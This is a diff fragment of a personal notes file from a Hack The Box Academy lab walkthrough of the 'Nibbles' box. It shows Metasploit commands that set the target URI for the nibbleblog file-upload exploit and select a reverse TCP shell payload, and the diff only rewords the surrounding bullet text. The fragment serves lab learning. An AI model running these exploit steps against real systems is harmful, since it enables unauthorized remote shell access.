secmancer/sec-notes-repo/Hack The Box/HTB Academy/Skill Paths/Cracking into HTB/Getting Started/Attacking your First Box/Nibbles - Alternate User Method - Metasploit.md

 msf6 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
 targeturi => nibbleblog
 ```
 - We also need to change the payload type.
-For our purposes let's go with `generic/shell_reverse_tcp`.
-We put these options and then type `exploit` and receive a reverse shell.
+- For our purposes let's use `generic/shell_reverse_tcp`.
+- Once we are ready, then we can run `exploit` and receive a reverse shell.
 ```shell-session
 msf6 exploit(multi/http/nibbleblog_file_upload) > set payload generic/shell_reverse_tcp
 payload => generic/shell_reverse_tcp